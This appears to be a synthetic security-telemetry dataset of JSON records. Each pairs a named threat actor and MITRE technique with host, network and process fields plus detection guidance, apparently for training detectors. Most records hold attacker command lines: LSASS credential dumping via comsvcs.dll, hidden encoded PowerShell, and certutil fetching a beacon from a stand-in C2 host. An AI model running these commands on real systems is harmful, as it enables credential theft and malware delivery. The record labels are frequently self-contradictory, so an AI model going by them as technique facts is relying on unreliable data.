text
stringlengths
1.13k
1.33k
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Lateral Movement","Discovery"],"technique_id":"T1566.001"},"event_id":"evt_fin7_20260517T163913000Z_0005601","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["LOLBin","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.173.74.112","name":"DB-ORACLE-GXTHH7I5IH","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5601FIN7T1566.001"},"network":{"domain":"github.com","dst_ip":"1.98.104.221","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3941 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-11T21:41:05.000Z","user":{"name":"i-upyk41smlh88","sid":"S-1-5-21-981809009-419560822-3002"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact","Lateral Movement","Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250324T150722000Z_0005603","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.219.67.147","name":"DB-ORACLE-GZB87QG8KC","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5603APT41T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.188.150.60","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2332 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-07-27T23:23:48.000Z","user":{"name":"svc_rq04vwixw6r6","sid":"S-1-5-21-925731149-309875567-8977"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Lateral Movement","Command and Control","Impact"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20260420T172447000Z_0005605","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.223.45.163","name":"EC2-INST-FJXMYQVJ6H","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5605UNC4841T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.56.172.129","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-12-26T02:05:42.000Z","user":{"name":"azuread\\gyq0c2yu6zh6","sid":"S-1-5-21-703095238-466461249-8399"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Execution"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260418T204705000Z_0005607","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.214.46.83","name":"DB-ORACLE-BKJZQNP1XE","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5607Volt TyphoonT1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.13.133.122","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2454 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-03-26T09:21:49.000Z","user":{"name":"svc_10uz5xzs0kj9","sid":"S-1-5-21-585145426-482146645-2430"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Defense Evasion","Lateral Movement","Credential Access"],"technique_id":"T1484.001"},"event_id":"evt_apt29_20260602T124217000Z_0005609","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.38.95.203","name":"EC2-INST-4M0OUE0YEZ","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5609APT29T1484.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.114.224.67","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"svchost.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-04-11T01:52:27.000Z","user":{"name":"CORP\\n3vasjephd71","sid":"S-1-5-21-669714046-353952547-1013"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Defense Evasion","Collection","Privilege Escalation"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20260925T152352000Z_0005611","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["TLS","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.169.125.239","name":"WIN-FIN-SRV-5KIAUI6NO3","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5611Mustang PandaT1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.103.224.191","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 527 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-02-03T10:12:34.000Z","user":{"name":"svc_s2fv5w22094l","sid":"S-1-5-21-392958411-828191923-6310"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access"],"technique_id":"T1570"},"event_id":"evt_mustangpanda_20260201T211949000Z_0005613","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.77.35.99","name":"IAM-ROLE-RQ5BRE1CST","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5613Mustang PandaT1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.178.206.138","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"explorer.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-08-27T14:38:54.000Z","user":{"name":"i-swsr0h360n36","sid":"S-1-5-21-479518907-899993948-3799"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Initial Access","Collection","Discovery"],"technique_id":"T1570"},"event_id":"evt_volttyphoon_20260720T082928000Z_0005615","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.241.24.139","name":"WIN-FIN-SRV-HSDHTYYHVZ","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5615Volt TyphoonT1570"},"network":{"domain":"github.com","dst_ip":"1.112.158.173","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Sysmon (DS0024)","timestamp":"2025-02-08T03:10:12.000Z","user":{"name":"azuread\\bh1el8z9e4c0","sid":"S-1-5-21-841822325-488360326-9338"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Privilege Escalation","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_scatteredspider_20250203T175200000Z_0005617","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.247.139.9","name":"EC2-INST-J2BS7EGQ2Y","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5617Scattered SpiderT1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.105.246.185","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-20T22:41:15.000Z","user":{"name":"i-zgy2du1d4ev8","sid":"S-1-5-21-664455232-272324358-7197"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Collection"],"technique_id":"T1531"},"event_id":"evt_scatteredspider_20260911T125027000Z_0005619","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.255.180.71","name":"WIN-FIN-SRV-HVVFIRXWE4","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5619Scattered SpiderT1531"},"network":{"domain":"github.com","dst_ip":"1.83.29.126","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-04-17T12:26:41.000Z","user":{"name":"arn:aws:iam::lha3y756j8dg","sid":"S-1-5-21-843789399-720076020-2454"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1484.001 using encrypted C2 technique.","sub_technique":"Domain Policy Modification: Group Policy Modification","tactic":["Persistence","Privilege Escalation","Reconnaissance"],"technique_id":"T1484.001"},"event_id":"evt_scatteredspider_20261110T211710000Z_0005621","ground_truth":{"detection_guidance":"Sigma rule for T1484.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.140.14.209","name":"AZURE-VM-3WUJK3BZS5","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5621Scattered SpiderT1484.001"},"network":{"domain":"github.com","dst_ip":"1.88.26.145","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-07-28T05:55:21.000Z","user":{"name":"i-rtsyye2dh5ws","sid":"S-1-5-21-685069932-381942420-3531"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Impact"],"technique_id":"T1098.004"},"event_id":"evt_mustangpanda_20250719T044312000Z_0005623","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Fileless","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.121.238.173","name":"IAM-ROLE-ZM1EK55QW2","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5623Mustang PandaT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.66.100.17","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2511 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-06-14T21:48:03.000Z","user":{"name":"CORP\\jy0w26rqqyps","sid":"S-1-5-21-501267740-482557260-1295"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact","Lateral Movement","Privilege Escalation"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20250125T010933000Z_0005625","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Base64","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.61.20.113","name":"IAM-ROLE-JZFO98456N","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5625Volt TyphoonT1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.35.24.187","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-04-24T21:12:59.000Z","user":{"name":"azuread\\9umh7235rrf6","sid":"S-1-5-21-652383499-392069403-2637"}}
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Discovery","Lateral Movement"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20260427T023511000Z_0005627","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.74.238.134","name":"EC2-INST-MMPNK2MOST","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5627FIN7T1098.004"},"network":{"domain":"update.microsoft.com","dst_ip":"1.47.224.205","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-08-31T00:42:39.000Z","user":{"name":"CORP\\l6xsbkc1afql","sid":"S-1-5-21-695204351-130503050-3752"}}
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Reconnaissance"],"technique_id":"T1098.004"},"event_id":"evt_apt41_20250912T034735000Z_0005629","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.251.118.225","name":"IAM-ROLE-JNWXT7EAS4","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5629APT41T1098.004"},"network":{"domain":"github.com","dst_ip":"1.157.176.5","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1098 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-11-26T06:27:40.000Z","user":{"name":"i-savuqsii32kg","sid":"S-1-5-21-297197366-313598888-8132"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Collection","Defense Evasion","Persistence"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20250518T102145000Z_0005631","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["WMI","Base64","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.222.3.170","name":"DB-ORACLE-9L2B4LGRLF","os":"Amazon Linux 2"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5631UNC4841T1059.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.44.225.131","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Windows Security Log","timestamp":"2025-07-11T23:18:46.000Z","user":{"name":"CORP\\4o0et3qqvvev","sid":"S-1-5-21-123578319-146004645-2621"}}
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1059.001 using encrypted C2 technique.","sub_technique":"PowerShell","tactic":["Command and Control","Defense Evasion"],"technique_id":"T1059.001"},"event_id":"evt_volttyphoon_20260201T203520000Z_0005633","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.2.90.211","name":"DB-ORACLE-9EFLZK5AHO","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5633Volt TyphoonT1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.108.132.206","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-12-30T23:24:48.000Z","user":{"name":"svc_4ksf2khxpoom","sid":"S-1-5-21-983563604-258625031-1959"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Privilege Escalation"],"technique_id":"T1071.001"},"event_id":"evt_mustangpanda_20261103T093630000Z_0005635","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.229.185.157","name":"IAM-ROLE-EP1U4JGQKD","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5635Mustang PandaT1071.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.117.255.116","dst_port":8443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-12-06T12:36:06.000Z","user":{"name":"azuread\\i69xl57k18sf","sid":"S-1-5-21-188580065-275243949-6195"}}
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Privilege Escalation","Command and Control"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20260417T133143000Z_0005637","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.185.96.197","name":"WIN-FIN-SRV-9LQFF1R5FR","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5637UNC4841T1546.003"},"network":{"domain":"github.com","dst_ip":"1.41.29.27","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"powershell.exe","parent_name":"svchost.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-01-25T23:55:50.000Z","user":{"name":"i-er31ns6tu3hv","sid":"S-1-5-21-581282459-571655822-2773"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Impact"],"technique_id":"T1566.001"},"event_id":"evt_apt29_20251209T033241000Z_0005639","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Fileless","TLS","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.101.28.10","name":"IAM-ROLE-3JP6DMI7PM","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5639APT29T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.28.120.36","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-09-27T11:42:42.000Z","user":{"name":"azuread\\2n4lr206xbh3","sid":"S-1-5-21-131539219-459404748-6777"}}
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Persistence","Discovery","Lateral Movement"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20250111T123211000Z_0005641","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.149.72.18","name":"AZURE-VM-PCYSDI3OTV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5641Mustang PandaT1003.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.44.249.120","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2025-05-16T12:45:23.000Z","user":{"name":"i-e2oyeebc5o1w","sid":"S-1-5-21-849363244-685516593-3497"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Impact"],"technique_id":"T1098.004"},"event_id":"evt_apt29_20250616T165225000Z_0005643","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","LOLBin","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.182.20.199","name":"IAM-ROLE-J9XTJLNWF6","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5643APT29T1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.54.87.45","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Sysmon (DS0024)","timestamp":"2026-02-25T18:33:30.000Z","user":{"name":"svc_9o14w7sewvrx","sid":"S-1-5-21-139258991-674525628-2089"}}
{"attack":{"actor":"APT29","confidence":1.0,"description":"[APT29] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Discovery"],"technique_id":"T1071.001"},"event_id":"evt_apt29_20261202T172455000Z_0005645","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.162.150.93","name":"IAM-ROLE-28BDEGY1QW","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5645APT29T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.150.212.178","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-05-26T20:31:05.000Z","user":{"name":"azuread\\vcrz53v5uyrn","sid":"S-1-5-21-959075840-537218374-8374"}}
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1003.001 using fileless technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Lateral Movement","Credential Access"],"technique_id":"T1003.001"},"event_id":"evt_scatteredspider_20260919T162357000Z_0005647","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.58.253.36","name":"APP-WEB-6AFTTY8Y0T","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"5647Scattered SpiderT1003.001"},"network":{"domain":"cdn-content.com","dst_ip":"1.58.160.234","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1003 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Azure AD Sign-in 